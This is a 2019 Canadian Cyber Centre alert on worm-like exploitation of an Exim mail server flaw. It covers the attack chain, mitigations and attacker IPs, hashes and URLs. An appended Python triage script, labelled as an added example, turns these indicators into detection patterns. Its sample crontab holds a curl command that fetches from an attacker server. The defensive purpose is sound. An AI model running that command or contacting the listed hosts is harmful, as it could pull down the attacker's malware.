Alert - Active exploitation of EXIM vulnerability observed in the wild

Number: AL19-012
Date: 14 June 2019

Audience

This Alert is intended for IT professionals and managers of notified organizations.

Purpose

An Alert is used to raise awareness of a recently identified cyber threat that may impact cyber information assets, and to provide additional detection and mitigation advice to recipients. The Canadian Centre for Cyber Security ("Cyber Centre") is also available to provide additional assistance regarding the content of this Alert to recipients as requested.

Assessment

The Cyber Centre is aware of active exploitation of the Exim vulnerability highlighted in Advisory AV19-109, published on 7 June 2019. The exploitation appears to have a “wormable” component that spreads it to other vulnerable Exim instances.

There are two waves of exploitation. In the first wave, a remote actor sends malicious emails to a vulnerable Exim server, which allows them to run malicious code with the access level of the Exim process (in most instances, ‘root’). This code downloads additional malware from a command-and-control server owned by the actor.

In the second wave, the actor creates a cron job to maintain persistence and download other components of the exploit chain. One of these components is a Python script that actively searches the internet for other vulnerable Exim servers, connects to them and exploits the vulnerability on those targets (this is the wormable portion).

Additionally, the actor adds an RSA authentication key to the SSH server, which allows them to connect to the server as root. To help evade detection, the actor uses Tor nodes to deliver the malicious code and to connect over SSH.

Analytic comment

The Cyber Centre notes that the Exim exploitations are evolving over time and that the malware and scripts downloaded are not consistent across exploitations. This may indicate that the actor is still experimenting with the exploitation chain and that their final goal is not yet known, or it may indicate that multiple actors are using similar exploitation chains for different purposes.

Suggested actions

  • Patch vulnerable versions of Exim to the latest supported version.
  • Examine logs for unusual or unauthorized activity.
  • Examine all cron jobs for unauthorized entries and remove any that are found.
  • Examine the RSA authentication keys installed locally for the SSH server for any unauthorized keys.
  • Monitor for any unusual SSH connections to the Exim server, especially from unknown IP addresses.

References

CCCS Advisory AV19-109 on the Exim vulnerability: https://www.cyber.gc.ca/en/alerts/exim-security-advisory-0

Indicators of compromise

Hash values

Filename: certificate.crt
MD5: ff534af3104bc9a2030c9599bcd9a4b5
SHA1: d135675da359304f60e3711f1993f36f267e1800
SHA256: 3a9459472329585e384a7e32af277844468d5b1fccda6d80285549f92ee67f07

Filename: se
MD5: a6823231d6bc5e7afda3c6e10f855956
SHA1: 5797fe2ea08e627478777f2ede28bda2780707cf
SHA256: d8a787dc774748bf26e3dce1b079e9bef071c0327b6adcd8cc71ed956365201c

Filename: se
MD5: 03fb0990ef6a33cc863d0c1a4568689c
SHA1: f8c6ae6fa828ccdc97d79c541c5e1b3d65d6653b
SHA256: b4bae03ab71439208b79edfc5eaec42babacee982231dce001b70ec42835063a

Filename: atd
MD5: a6823231d6bc5e7afda3c6e10f855956
SHA1: 5797fe2ea08e627478777f2ede28bda2780707cf
SHA256: d8a787dc774748bf26e3dce1b079e9bef071c0327b6adcd8cc71ed956365201c

Filename: s
MD5: 8c7efb0493b6fb805b2c2f0593de0ab1
SHA1: d754163b369e4c27330cef03d6736779a699e5d9
SHA256: 1c8f184c3cf902bafc9df23b13a5d51cf801026bc3bde9d6b05cf047523ac6ed

IP Indicator(s)

85[.]25[.]84[.]99
173[.]212[.]214[.]137

URL Indicator(s)

hxxps://85[.]25[.]84[.]99/up[.]php
hxxp://173[.]212[.]214[.]137/se
hxxp://173[.]212[.]214[.]137/icantgetit

URI Indicator(s)

/se
/icantgetit

Domain Indicator(s)

orion1709[.]startdedicated[.]de
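To work through the suggested actions above against the indicators in this section, the following Python script is an added example; it is not Cyber Centre tooling or code from the alert. It copies the IP, domain, URI and SHA-256 indicators from the list above, re-fangs them, and runs the four checks the alert asks for (logs, cron jobs, SSH keys, file hashes) over constructed sample inputs: an Exim log and sshd/proxy lines, a crontab, an authorized_keys file and a file body, none of which are real captures. The authorized_keys parsing and the OpenSSH-style SHA256 fingerprint format are assumptions about the deployment, and the list of approved key fingerprints is something each site has to supply from its own records.

```python
"""Host triage helper for the Exim alert AL19-012 (added example, not Cyber Centre tooling).

Indicator values are copied from the alert's "Indicators of compromise" section;
every log line, crontab entry, authorized_keys line and file body below is a
constructed sample, not a real capture.
"""
import base64
import hashlib
import re

# Indicators copied from the alert, stored defanged exactly as published.
IOC_HOSTS = ["85[.]25[.]84[.]99", "173[.]212[.]214[.]137", "orion1709[.]startdedicated[.]de"]
IOC_URIS = ["/se", "/icantgetit"]
IOC_SHA256 = {
    "3a9459472329585e384a7e32af277844468d5b1fccda6d80285549f92ee67f07",  # certificate.crt
    "d8a787dc774748bf26e3dce1b079e9bef071c0327b6adcd8cc71ed956365201c",  # se and atd (same hashes)
    "b4bae03ab71439208b79edfc5eaec42babacee982231dce001b70ec42835063a",  # second se sample
    "1c8f184c3cf902bafc9df23b13a5d51cf801026bc3bde9d6b05cf047523ac6ed",  # s
}


def refang(indicator):
    """Turn the published defanged form back into the literal that appears in logs."""
    return indicator.replace("[.]", ".").replace("hxxp", "http")


def _compile_patterns():
    # Hosts need a non-host character on both sides so 85.25.84.99 does not fire
    # inside 185.25.84.99; URIs must end at a path delimiter so /se skips /send.
    pats = [(h, re.compile(r"(?<![\w.-])" + re.escape(refang(h)) + r"(?![\w-])")) for h in IOC_HOSTS]
    pats += [(u, re.compile(re.escape(u) + r"(?=[\s\"'?#]|$)")) for u in IOC_URIS]
    return pats


PATTERNS = _compile_patterns()


def scan_lines(lines):
    """(1-based line number, defanged indicator) for every indicator hit in the lines."""
    return [(n, label) for n, line in enumerate(lines, 1)
            for label, pat in PATTERNS if pat.search(line)]


def suspicious_cron(crontab_text):
    """Cron entries (comments and blank lines skipped) that reference an indicator."""
    entries = [e for e in crontab_text.splitlines() if e.strip() and not e.lstrip().startswith("#")]
    return [e for e in entries if scan_lines([e])]


def ssh_fingerprint(blob_b64):
    """OpenSSH-style SHA256 fingerprint of a base64 public-key blob (padding stripped)."""
    digest = hashlib.sha256(base64.b64decode(blob_b64)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def unknown_ssh_keys(authorized_keys_text, approved_fingerprints):
    """Keys in an authorized_keys file whose fingerprint is not on the approved list."""
    unknown = []
    for line in authorized_keys_text.splitlines():
        parts = line.split()
        if not parts or parts[0].startswith("#"):
            continue
        # An options field (from=, command=, ...) may precede the key type; options
        # that themselves contain spaces are not handled by this simple split.
        idx = next((i for i, p in enumerate(parts) if p.startswith(("ssh-", "ecdsa-", "sk-"))), None)
        if idx is None or idx + 1 >= len(parts):
            continue
        fp = ssh_fingerprint(parts[idx + 1])
        if fp not in approved_fingerprints:
            unknown.append({"type": parts[idx], "fingerprint": fp, "comment": " ".join(parts[idx + 2:])})
    return unknown


def hash_hits(files):
    """Names of files (name -> bytes) whose SHA-256 matches one of the alert's hashes."""
    return [name for name, data in files.items() if hashlib.sha256(data).hexdigest() in IOC_SHA256]


def triage(log_lines, crontab_text, authorized_keys_text, approved_fingerprints, files):
    """Run the four checks from the alert's suggested actions and collect the findings."""
    return {
        "log_hits": scan_lines(log_lines),
        "cron": suspicious_cron(crontab_text),
        "ssh_keys": unknown_ssh_keys(authorized_keys_text, approved_fingerprints),
        "files": hash_hits(files),
    }


# Constructed sample inputs (not real captures). Only the third log line, the
# curl cron entry and the second SSH key are meant to be flagged.
SAMPLE_LOG = [
    "2019-06-10 03:14:07 1hZxQ1-0001aB-2C <= alice@example.net H=(mail.example.net) [192.0.2.10] P=esmtp S=1234",
    "2019-06-10 03:14:09 1hZxQ1-0001aB-2C => bob <bob@example.net> R=local_user T=local_delivery",
    "Jun 10 03:15:02 mx1 sshd[4120]: Accepted publickey for root from 173.212.214.137 port 41022 ssh2",
    '10.0.0.5 - - [10/Jun/2019:03:15:10 +0000] "GET /icantgetit HTTP/1.1" 200 512',
    '10.0.0.5 - - [10/Jun/2019:03:16:00 +0000] "GET /send HTTP/1.1" 200 88',
]
SAMPLE_CRONTAB = "\n".join([
    "# m h dom mon dow command",
    "0 3 * * * /usr/bin/certbot renew --quiet",
    "*/10 * * * * /usr/bin/curl -s http://173.212.214.137/icantgetit",
])
_OPS_BLOB = base64.b64encode(b"constructed-key-material:ops").decode()
_UNKNOWN_BLOB = base64.b64encode(b"constructed-key-material:unknown").decode()
SAMPLE_AUTHORIZED_KEYS = "\n".join([
    "# key issued by the ops team",
    "ssh-ed25519 " + _OPS_BLOB + " ops@bastion",
    'from="203.0.113.7" ssh-rsa ' + _UNKNOWN_BLOB + " nobody@nowhere",
])
APPROVED_FINGERPRINTS = {ssh_fingerprint(_OPS_BLOB)}  # site-supplied allow-list in practice
SAMPLE_FILES = {"certificate.crt": b"-----BEGIN CERTIFICATE-----\nconstructed benign body\n"}

if __name__ == "__main__":
    report = triage(SAMPLE_LOG, SAMPLE_CRONTAB, SAMPLE_AUTHORIZED_KEYS, APPROVED_FINGERPRINTS, SAMPLE_FILES)
    for section, findings in report.items():
        print(section, findings)
```

On a real host the same functions take the lines of the Exim main log and the SSH authentication log (whatever paths your distribution uses), the output of crontab -l for root plus the system cron directories, the root account's authorized_keys file, and the bytes of any unexpected files; any non-empty section of the report is exactly what the suggested actions above ask you to investigate, and the fingerprint allow-list must come from your own key inventory rather than from the file being checked.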

Note to readers

The Canadian Centre for Cyber Security (Cyber Centre) operates as part of the Communications Security Establishment. We are Canada's national authority on cyber security and we lead the government's response to cyber security events. As Canada's national computer security incident response team, the Cyber Centre works in close collaboration with government departments, critical infrastructure, Canadian businesses and international partners to prepare for, respond to, mitigate, and recover from cyber events. We do this by providing authoritative advice and support, and coordinating information sharing and incident response. The Cyber Centre is outward-facing, welcoming partnerships that help build a stronger, more resilient cyber space in Canada.